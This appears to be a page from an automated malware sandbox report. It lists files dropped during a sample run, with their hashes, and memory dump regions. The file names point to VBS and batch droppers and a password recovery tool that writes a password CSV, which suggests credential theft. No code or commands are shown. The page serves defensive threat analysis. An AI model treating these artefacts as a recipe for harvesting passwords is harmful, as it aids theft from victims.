C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
6af2deaa2a55bfd1a32fd765f7a0909f

SHA1
703e95aca6edc5bf559604d4f470f44b5b2393c4

SHA256
ec97dbe5624f72f0625f463d349296145d23b3066265eb398beb28c459b180cf

SHA512
e99063787943039b1c2e2d14ee4d1ea97db6fbc53d37fbd6f5aefd3d7c9c89e2c290de062114ae99690eadf29e23622e4d1dae35d7bbf2176477fd15407e3b8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
6d037a863b59de3e3f731a994294b5b1

SHA1
042e3cbefb6cb32d7bf23a7bbc717a4f256d251d

SHA256
fc2fc6f8c0cf4e3e4582b556208f8032719c8e5380c292f9b5d3ff8ad68a5126

SHA512
5f9ddbf0faa17028c75f7297393bf511265d77a9f107ec5a0676ad77e2a9350840ce062b6164555be8442e3e290ed4e88a7b1d093635d7c083345d6fb4a4574d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
84707f24324af70f9fcf4e096435b9dc

SHA1
426939fed288efdac05819cbe0de5a792416793e

SHA256
d667895b056a17249940bdef8a94849f57aec7ec0bc10a8f8f4d20a454e5b67b

SHA512
bc7618a3d941d3df36fc2167ec24835444e4ade3256f953891d800a1496de73a269eeb196a102eb87f103607021f0b971606587c98e1bfe59b3fd20f11028a14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5
4d444e4cd8a1f7d9c922d8f581fec35a

SHA1
5b260b1fc3c0d08ba8d7165a9e801ee2e0c1f50c

SHA256
0bcbe921e49d7e8ede4198c0f9e5577c3ee9e6514389b19de22bc5296935de52

SHA512
cdb484b89c2340955f35ea1d16ef5f5b96f1afb53143f413b714b512249e716fed0f9211c2638cd44862ac4b0e7c2f9d80e8868f2347023c3e65bb5a0a13825e

Download Submit
C:\Users\Admin\AppData\Local\Temp\idgrik.vbs

MD5
56cddc491cb1d7a0c2a2ca7653c1f6fb

SHA1
e6a8f1b303217eeb1f0eaeda1a00a657b0b0e53a

SHA256
891af9d3fe247064f6357d7bead33badfd82535105c21d11031fbd58989d0325

SHA512
7b8d3a816830246c582b3a3fbb68ff36d2953955345aa87d66f05a6894850517b26265be81090b4bf0ec8a91e20cee43def45bc8964ec0c718dbae6990ca6302

Download Submit
C:\Users\Public\23.bat

MD5
97d1cb05e43bc857bd4de542d6933bdd

SHA1
3aa05c6d757ca70caae321c831597fc4b6dc57b0

SHA256
8a5cad5cd1a1bda2ff5b17b565f122d933edd0c85ffa2b4da3540fccfb3e55e9

SHA512
0af9e30eae0f4eccb952bc755c12a645dc3623836c129f2497f3199e1c922523196e90821327bdbb381fee9229daacb77ffa9c5b848a955cc890f46c7a656b9d

Download Submit
C:\Users\Public\23.vbs

MD5
622e55a91482a6fb74ed2ce2f63eb5fe

SHA1
ce8a72f443a970cecd70716e1cd14e85a30f0502

SHA256
577b2b3fa0c726d53f4ca7f870fadb22fc4453519b8fd89ebb97166faa369a31

SHA512
1240cad02628b2db3da05ac4e7f5040249985043ba36aaf88123976fa25d609b215fc28196d8a5af2254be03cea81e1ab92fa29fe2e2968a21154a588a2dde08

Download Submit
C:\Users\Public\Untitled.ps1

MD5
1815297b61cb811d687e67f339188392

SHA1
d11926019c6d0d9938dbea12b6c836f1bf274b64

SHA256
5a31779c78394f5329eb60580193a8501280c434ad8b3a03c1a26b36839c1a96

SHA512
4bd22f9b7bf7986411b2f24231d396526d5814a7ae74699970cc670ae3a2ba9ef06efb3ea04dc79427edacf49e275716302a2f5710279676af1d085e473eb17c

Download Submit
\??\c:\0011aa\11.vbs

MD5
a6f88692e36a2bd3294742fbb17f1777

SHA1
87c9db47b6da497554d7f72288dc33d7de4ba38f

SHA256
a5d4742486f8c987bf7a70bebc382379a493ba33f3d77c6fa162436b587c18c9

SHA512
8f99532fd67ff70152ed015043c6d195b94f9d51089c91a59cf95550b45017422b2ec5e06bea25e2d79b5761f2e9c031a35f4496c513d5604ddb001d2e198f8d

Download Submit
\??\c:\0011aa\11pass.csv

MD5
e38fc32e246b9eea220d0a86ecba5a35

SHA1
05285431b6cacbe698f78d3484545bf439b24f5a

SHA256
211a72040ed660e28b79844abe982e368a75e7dd63dda6edc5867c9f2bdb5877

SHA512
355621925c516bed56c927168cb7da70a6435c8ece776d71a7ff80d3d03fdd32f85bb131f46c1e8e0503c158e9754fd4af0371e3a0a224a74db6569c214a2a0a

Download Submit
\??\c:\0011aa\allinonepasswordrecoverypro.exe

MD5
a48e3197ab0f64c4684f0828f742165c

SHA1
f935c3d6f9601c795f2211e34b3778fad14442b4

SHA256
baecc747370a4c396ef5403a3a2b286465d8fe4677bf1bfd23b8164ef5c22bbb

SHA512
e0b0b73c39850a30aac89f84f721c79f863612f596d6ff3df0860a9faf743a81364656773c99708e9c0656c74b6a278b6bf7e648f7ff1b9080f9a21e10515a59

Download Submit
\??\c:\0011aa\license.xenarmor

MD5
774a9a7b72f7ed97905076523bdfe603

SHA1
946355308d2224694e0957f4ebf6cdba58327370

SHA256
76e56835b1ac5d7a8409b7333826a2353401cf67f3bd95c733adc6aa8d9fec81

SHA512
c5c77c6827c72901494b3a368593cb9a990451664b082761294a845c0cd9441d37e5e9ac0e82155cb4d97f29507ffc8e26d6ff74009666c3075578aa18b28675

Download Submit
\??\c:\0011aa\settings.db

MD5
56b941f65d270f2bf397be196fcf4406

SHA1
244f2e964da92f7ef7f809e5ce0b3191aeab084a

SHA256
00c020ba1cce022364976f164c575993cb3b811c61b5b4e05a8a0c3d1b560c0c

SHA512
52ad8c7ed497a5b8eed565b3abcbf544841f3c8c9ec3ca8f686846a2afd15ac4ac8b16abf1cb14aeca1a2fb31f3086ad17206ec4af28e77bae600dca15e8deab

Download Submit
\??\c:\0011aa\xenmanager.dll

MD5
7a5c53a889c4bf3f773f90b85af5449e

SHA1
25b2928c310b3068b629e9dca38c7f10f6adc5b6

SHA256
baa9c3a0d0524263c4f848056b3f1da3b4bb913162362cbcabe77ce76a39870c

SHA512
f5943687d7e098790581bf56ac6fec3b7e9b83d0e29301077a8bc48768c5a0e9f54f53d926f9847885f6035a2b31e456e4e45ccf1c70be27229c46e79876e2ed

Download Submit
memory/1140-188-0x000001BBB70D0000-0x000001BBB70D2000-memory.dmp

Filesize
8KB

Download
memory/1140-187-0x00007FFB58933000-0x00007FFB58935000-memory.dmp

Filesize
8KB

Download
memory/1140-189-0x000001BBB70D3000-0x000001BBB70D5000-memory.dmp

Filesize
8KB

Download
memory/1140-194-0x000001BBB70D6000-0x000001BBB70D8000-memory.dmp

Filesize
8KB

Download
memory/1256-253-0x000002A8AAA96000-0x000002A8AAA98000-memory.dmp

Filesize
8KB

Download
memory/1256-252-0x000002A8AAA93000-0x000002A8AAA95000-memory.dmp

Filesize
8KB

Download
memory/1256-250-0x00007FFB58933000-0x00007FFB58935000-memory.dmp

Filesize
8KB

Download
memory/1256-251-0x000002A8AAA90000-0x000002A8AAA92000-memory.dmp

Filesize
8KB

Download
memory/1276-214-0x0000000074F4E000-0x0000000074F4F000-memory.dmp

Filesize
4KB

Download
memory/1276-215-0x00000000057E0000-0x00000000057E1000-memory.dmp

Filesize
4KB

Download
memory/1568-241-0x0000000074F4E000-0x0000000074F4F000-memory.dmp

Filesize
4KB

Download
memory/1568-242-0x0000000002AF0000-0x0000000002AF1000-memory.dmp

Filesize
4KB

Download
memory/1612-138-0x0000023FD4420000-0x0000023FD4422000-memory.dmp

Filesize
8KB

Download
memory/1612-135-0x0000023FD4350000-0x0000023FD4372000-memory.dmp

Filesize
136KB

Download
memory/1612-139-0x0000023FD4423000-0x0000023FD4425000-memory.dmp

Filesize
8KB

Download
memory/1612-140-0x0000023FD4426000-0x0000023FD4428000-memory.dmp

Filesize
8KB

Download
memory/1612-133-0x00007FFB58933000-0x00007FFB58935000-memory.dmp

Filesize
8KB

Download
memory/1708-266-0x000001F044F63000-0x000001F044F65000-memory.dmp

Filesize
8KB

Download
memory/1708-264-0x00007FFB58933000-0x00007FFB58935000-memory.dmp

Filesize
8KB

Download
memory/1708-265-0x000001F044F60000-0x000001F044F62000-memory.dmp

Filesize
8KB

Download
memory/1748-256-0x0000000074F4E000-0x0000000074F4F000-memory.dmp

Filesize
4KB

Download
memory/1748-257-0x0000000005190000-0x0000000005191000-memory.dmp

Filesize
4KB

Download
memory/2080-282-0x0000000007120000-0x0000000007142000-memory.dmp

Filesize
136KB

Download
memory/2080-281-0x0000000006B52000-0x0000000006B53000-memory.dmp

Filesize
4KB

Download
memory/2080-289-0x0000000006B55000-0x0000000006B57000-memory.dmp

Filesize
8KB

Download
memory/2080-288-0x0000000008550000-0x0000000008572000-memory.dmp

Filesize
136KB

Download
memory/2080-287-0x00000000084D0000-0x00000000084EA000-memory.dmp

Filesize
104KB

Download
memory/2080-286-0x00000000091B0000-0x0000000009246000-memory.dmp

Filesize
600KB

Download
memory/2080-285-0x0000000008000000-0x000000000801E000-memory.dmp

Filesize
120KB

Download
memory/2080-283-0x0000000007930000-0x0000000007996000-memory.dmp

Filesize
408KB

Download
memory/2080-277-0x00000000046C0000-0x00000000046F6000-memory.dmp

Filesize
216KB

Download
memory/2080-278-0x0000000007190000-0x00000000077B8000-memory.dmp

Filesize
6.2MB

Download
memory/2080-279-0x0000000074F4E000-0x0000000074F4F000-memory.dmp

Filesize
4KB

Download
memory/2080-280-0x0000000006B50000-0x0000000006B51000-memory.dmp

Filesize
4KB

Download
memory/2196-222-0x00007FFB58933000-0x00007FFB58935000-memory.dmp

Filesize
8KB

Download
memory/2196-225-0x0000028AAB696000-0x0000028AAB698000-memory.dmp

Filesize
8KB

Download
memory/2196-224-0x0000028AAB693000-0x0000028AAB695000-memory.dmp

Filesize
8KB

Download
memory/2196-223-0x0000028AAB690000-0x0000028AAB692000-memory.dmp

Filesize
8KB

Download
memory/2292-230-0x0000000074F4E000-0x0000000074F4F000-memory.dmp

Filesize
4KB

Download
memory/2292-231-0x0000000005580000-0x0000000005581000-memory.dmp

Filesize
4KB

Download
memory/2984-200-0x00000000056D0000-0x0000000005736000-memory.dmp

Filesize
408KB

Download
memory/2984-199-0x0000000005C10000-0x00000000061B4000-memory.dmp

Filesize
5.6MB

Download
memory/2984-258-0x0000000006440000-0x00000000064B6000-memory.dmp

Filesize
472KB

Download
memory/2984-263-0x00000000063C0000-0x00000000063DE000-memory.dmp

Filesize
120KB

Download
memory/2984-272-0x0000000006840000-0x00000000068D2000-memory.dmp

Filesize
584KB

Download
memory/2984-193-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2984-196-0x0000000074F4E000-0x0000000074F4F000-memory.dmp

Filesize
4KB

Download
memory/2984-197-0x0000000002D30000-0x0000000002D31000-memory.dmp

Filesize
4KB

Download
memory/2984-198-0x00000000055C0000-0x000000000565C000-memory.dmp

Filesize
624KB

Download
memory/3168-156-0x00007FFB58933000-0x00007FFB58935000-memory.dmp

Filesize
8KB

Download
memory/3260-175-0x0000029247D86000-0x0000029247D88000-memory.dmp

Filesize
8KB

Download
memory/3260-173-0x0000029247D80000-0x0000029247D82000-memory.dmp

Filesize
8KB

Download
memory/3260-171-0x00007FFB58933000-0x00007FFB58935000-memory.dmp

Filesize
8KB

Download
memory/3260-174-0x0000029247D83000-0x0000029247D85000-memory.dmp

Filesize
8KB

Download
memory/3352-211-0x000001D7FA4E6000-0x000001D7FA4E8000-memory.dmp

Filesize
8KB

Download
memory/3352-210-0x000001D7FA4E3000-0x000001D7FA4E5000-memory.dmp

Filesize
8KB

Download
memory/3352-208-0x00007FFB58933000-0x00007FFB58935000-memory.dmp

Filesize
8KB

Download
memory/3352-209-0x000001D7FA4E0000-0x000001D7FA4E2000-memory.dmp

Filesize
8KB

Download
memory/3800-155-0x000002CBE0DD8000-0x000002CBE0DDA000-memory.dmp

Filesize
8KB

Download
memory/3800-150-0x000002CBE0DD6000-0x000002CBE0DD8000-memory.dmp

Filesize
8KB

Download
memory/3800-147-0x00007FFB58933000-0x00007FFB58935000-memory.dmp

Filesize
8KB

Download
memory/3800-149-0x000002CBE0DD3000-0x000002CBE0DD5000-memory.dmp

Filesize
8KB

Download
memory/3800-148-0x000002CBE0DD0000-0x000002CBE0DD2000-memory.dmp

Filesize
8KB

Download
memory/3920-274-0x0000000002830000-0x0000000002831000-memory.dmp

Filesize
4KB

Download
memory/3920-273-0x0000000074F4E000-0x0000000074F4F000-memory.dmp

Filesize
4KB

Download